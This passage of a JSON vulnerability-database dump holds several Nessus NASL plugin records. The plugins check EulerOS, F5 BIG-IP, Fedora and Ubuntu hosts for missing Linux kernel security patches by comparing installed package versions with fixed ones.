\"python-perf-4.19.28-1.2.117\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-05-18T14:17:51", "description": "The __switch_to function in arch/x86/kernel/process_64.c in the Linux kernel through 3.18.1 does not ensure that Thread Local Storage (TLS) descriptors are loaded before proceeding with other steps, which makes it easier for local users to bypass the ASLR protection mechanism via a crafted application that reads a TLS base address.", "cvss3": {}, "published": "2015-11-09T00:00:00", "type": "nessus", "title": "F5 Networks BIG-IP : Linux kernel vulnerability (SOL17551)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-9419"], "modified": "2021-03-10T00:00:00", "cpe": ["cpe:/a:f5:big-ip_access_policy_manager", "cpe:/a:f5:big-ip_advanced_firewall_manager", "cpe:/a:f5:big-ip_application_acceleration_manager", "cpe:/a:f5:big-ip_application_security_manager", "cpe:/a:f5:big-ip_application_visibility_and_reporting", "cpe:/a:f5:big-ip_global_traffic_manager", "cpe:/a:f5:big-ip_link_controller", "cpe:/a:f5:big-ip_local_traffic_manager", "cpe:/a:f5:big-ip_policy_enforcement_manager", "cpe:/a:f5:big-ip_wan_optimization_manager", "cpe:/a:f5:big-ip_webaccelerator", "cpe:/h:f5:big-ip", "cpe:/h:f5:big-ip_protocol_security_manager"], "id": "F5_BIGIP_SOL17551.NASL", "href": "https://www.tenable.com/plugins/nessus/86796", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from F5 Networks BIG-IP Solution SOL17551.\n#\n# The text description of this plugin is (C) F5 Networks.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(86796);\n script_version(\"2.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/10\");\n\n script_cve_id(\"CVE-2014-9419\");\n script_bugtraq_id(71794);\n\n script_name(english:\"F5 Networks BIG-IP : Linux kernel vulnerability (SOL17551)\");\n script_summary(english:\"Checks the BIG-IP version.\");\n\n script_set_attribute(\n attribute:\"synopsis\",\n value:\"The remote device is missing a vendor-supplied security patch.\"\n );\n script_set_attribute(\n attribute:\"description\",\n value:\n\"The __switch_to function in arch/x86/kernel/process_64.c in the Linux\nkernel through 3.18.1 does not ensure that Thread Local Storage (TLS)\ndescriptors are loaded before proceeding with other steps, which makes\nit easier for local users to bypass the ASLR protection mechanism via\na crafted application that reads a TLS base address.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://support.f5.com/csp/article/K17551\"\n );\n script_set_attribute(\n attribute:\"solution\",\n value:\n\"Upgrade to one of the non-vulnerable versions listed in the F5\nSolution SOL17551.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:ND/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_access_policy_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_advanced_firewall_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_acceleration_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_security_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_application_visibility_and_reporting\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_global_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_link_controller\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_local_traffic_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_policy_enforcement_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_wan_optimization_manager\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:f5:big-ip_webaccelerator\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/h:f5:big-ip_protocol_security_manager\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/12/26\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/11/06\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/11/09\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"F5 Networks Local Security Checks\");\n\n script_dependencies(\"f5_bigip_detect.nbin\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/BIG-IP/hotfix\", \"Host/BIG-IP/modules\", \"Host/BIG-IP/version\", \"Settings/ParanoidReport\");\n\n exit(0);\n}\n\n\ninclude(\"f5_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nversion = get_kb_item(\"Host/BIG-IP/version\");\nif ( ! version ) audit(AUDIT_OS_NOT, \"F5 Networks BIG-IP\");\nif ( isnull(get_kb_item(\"Host/BIG-IP/hotfix\")) ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/hotfix\");\nif ( ! get_kb_item(\"Host/BIG-IP/modules\") ) audit(AUDIT_KB_MISSING, \"Host/BIG-IP/modules\");\n\nsol = \"SOL17551\";\nvmatrix = make_array();\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\n# AFM\nvmatrix[\"AFM\"] = make_array();\nvmatrix[\"AFM\"][\"affected\" ] = make_list(\"11.3.0-11.6.0\");\nvmatrix[\"AFM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# AM\nvmatrix[\"AM\"] = make_array();\nvmatrix[\"AM\"][\"affected\" ] = make_list(\"11.4.0-11.6.0\");\nvmatrix[\"AM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# APM\nvmatrix[\"APM\"] = make_array();\nvmatrix[\"APM\"][\"affected\" ] = make_list(\"11.0.0-11.6.0\",\"10.1.0-10.2.4\");\nvmatrix[\"APM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# ASM\nvmatrix[\"ASM\"] = make_array();\nvmatrix[\"ASM\"][\"affected\" ] = make_list(\"11.0.0-11.6.0\",\"10.1.0-10.2.4\");\nvmatrix[\"ASM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# AVR\nvmatrix[\"AVR\"] = make_array();\nvmatrix[\"AVR\"][\"affected\" ] = make_list(\"11.0.0-11.6.0\");\nvmatrix[\"AVR\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# LC\nvmatrix[\"LC\"] = make_array();\nvmatrix[\"LC\"][\"affected\" ] = make_list(\"11.0.0-11.6.0\",\"10.1.0-10.2.4\");\nvmatrix[\"LC\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# LTM\nvmatrix[\"LTM\"] = make_array();\nvmatrix[\"LTM\"][\"affected\" ] = make_list(\"11.0.0-11.6.0\",\"10.1.0-10.2.4\");\nvmatrix[\"LTM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n# PEM\nvmatrix[\"PEM\"] = make_array();\nvmatrix[\"PEM\"][\"affected\" ] = make_list(\"11.3.0-11.6.0\");\nvmatrix[\"PEM\"][\"unaffected\"] = make_list(\"12.0.0\");\n\n\nif (bigip_is_affected(vmatrix:vmatrix, sol:sol))\n{\n if (report_verbosity > 0) security_note(port:0, extra:bigip_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = bigip_get_tested_modules();\n audit_extra = \"For BIG-IP module(s) \" + tested + \",\";\n if (tested) audit(AUDIT_INST_VER_NOT_VULN, audit_extra, version);\n else audit(AUDIT_HOST_NOT, \"running any of the affected modules\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:22:23", "description": "The 4.2.2 stable kernel update contains a number of important fixes across the tree. kernel-4.2.2-300.fc23 - Linux v4.2.2\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2016-03-04T00:00:00", "type": "nessus", "title": "Fedora 23 : kernel-4.2.2-300.fc23 (2015-3c8c8ba072)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-5257"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:23"], "id": "FEDORA_2015-3C8C8BA072.NASL", "href": "https://www.tenable.com/plugins/nessus/89218", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-3c8c8ba072.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(89218);\n script_version(\"2.3\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-5257\");\n script_xref(name:\"FEDORA\", value:\"2015-3c8c8ba072\");\n\n script_name(english:\"Fedora 23 : kernel-4.2.2-300.fc23 (2015-3c8c8ba072)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The 4.2.2 stable kernel update contains a number of important fixes\nacross the tree. kernel-4.2.2-300.fc23 - Linux v4.2.2\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1265607\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-October/168045.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?6ecb20b1\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:L/Au:N/C:N/I:N/A:C\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:23\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/10/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2016/03/04\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2016-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^23([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 23.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC23\", reference:\"kernel-4.2.2-300.fc23\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:13:55", "description": "Update to latest upstream stable release, Linux v4.0.5. Wide variety of fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-06-22T00:00:00", "type": "nessus", "title": "Fedora 22 : kernel-4.0.5-300.fc22 (2015-9712)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1420"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:22"], "id": "FEDORA_2015-9712.NASL", "href": "https://www.tenable.com/plugins/nessus/84309", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-9712.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84309);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1420\");\n script_xref(name:\"FEDORA\", value:\"2015-9712\");\n\n script_name(english:\"Fedora 22 : kernel-4.0.5-300.fc22 (2015-9712)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest upstream stable release, Linux v4.0.5. Wide variety\nof fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1187534\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160562.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e17d3147\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:22\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^22([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 22.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC22\", reference:\"kernel-4.0.5-300.fc22\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:03", "description": "Update to latest upstream stable release, Linux v4.0.5. Wide variety of fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-06-22T00:00:00", "type": "nessus", "title": "Fedora 21 : kernel-4.0.5-200.fc21 (2015-9704)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1420"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:kernel", "cpe:/o:fedoraproject:fedora:21"], "id": "FEDORA_2015-9704.NASL", "href": "https://www.tenable.com/plugins/nessus/84308", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2015-9704.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84308);\n script_version(\"2.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2015-1420\");\n script_xref(name:\"FEDORA\", value:\"2015-9704\");\n\n script_name(english:\"Fedora 21 : kernel-4.0.5-200.fc21 (2015-9704)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Update to latest upstream stable release, Linux v4.0.5. Wide variety\nof fixes across the tree.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1187534\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2015-June/160328.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?de0ceb1d\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected kernel package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:kernel\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:21\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/06/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2015-2021 Tenable Network Security, Inc.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^21([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 21.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC21\", reference:\"kernel-4.0.5-200.fc21\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"kernel\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:14:55", "description": "A race condition was discovered in the Linux kernel's file_handle size verification. A local user could exploit this flaw to read potentially sensative memory locations.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2015-07-08T00:00:00", "type": "nessus", "title": "Ubuntu 12.04 LTS : linux vulnerability (USN-2660-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2015-1420"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank", "p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual", "cpe:/o:canonical:ubuntu_linux:12.04:-:lts"], "id": "UBUNTU_USN-2660-1.NASL", "href": "https://www.tenable.com/plugins/nessus/84612", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-2660-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(84612);\n script_version(\"2.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2015-1420\");\n script_xref(name:\"USN\", value:\"2660-1\");\n\n script_name(english:\"Ubuntu 12.04 LTS : linux vulnerability (USN-2660-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"A race condition was discovered in the Linux kernel's file_handle size\nverification. A local user could exploit this flaw to read potentially\nsensative memory locations.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/2660-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:L/AC:M/Au:N/C:P/I:N/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-generic-pae\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-highbank\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:linux-image-3.2-virtual\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:12.04:-:lts\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2015/03/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2015/07/07\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2015/07/08\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2015-2020 Canonical, Inc. / NASL script (C) 2015-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\", \"linux_alt_patch_detect.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"ksplice.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! preg(pattern:\"^(12\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 12.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nif (get_one_kb_item(\"Host/ksplice/kernel-cves\"))\n{\n rm_kb_item(name:\"Host/uptrack-uname-r\");\n cve_list = make_list(\"CVE-2015-1420\");\n if (ksplice_cves_check(cve_list))\n {\n audit(AUDIT_PATCH_INSTALLED, \"KSplice hotfix for USN-2660-1\");\n }\n else\n {\n _ubuntu_report = ksplice_reporting_text();\n }\n}\n\nflag = 0;\n\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-87-generic\", pkgver:\"3.2.0-87.125\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-87-generic-pae\", pkgver:\"3.2.0-87.125\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-87-highbank\", pkgver:\"3.2.0-87.125\")) flag++;\nif (ubuntu_check(osver:\"12.04\", pkgname:\"linux-image-3.2.0-87-virtual\", pkgver:\"3.2.0-87.125\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_NOTE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"linux-image-3.2-generic / linux-image-3.2-generic-pae / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:41", "description": "Fix CVE-2014-3631\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2014-09-23T00:00:00", "type": "nessus", "title": "Fedora 21 : kernel-3.16.2-301.fc21 (2014-10693)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-3631"], "modified": 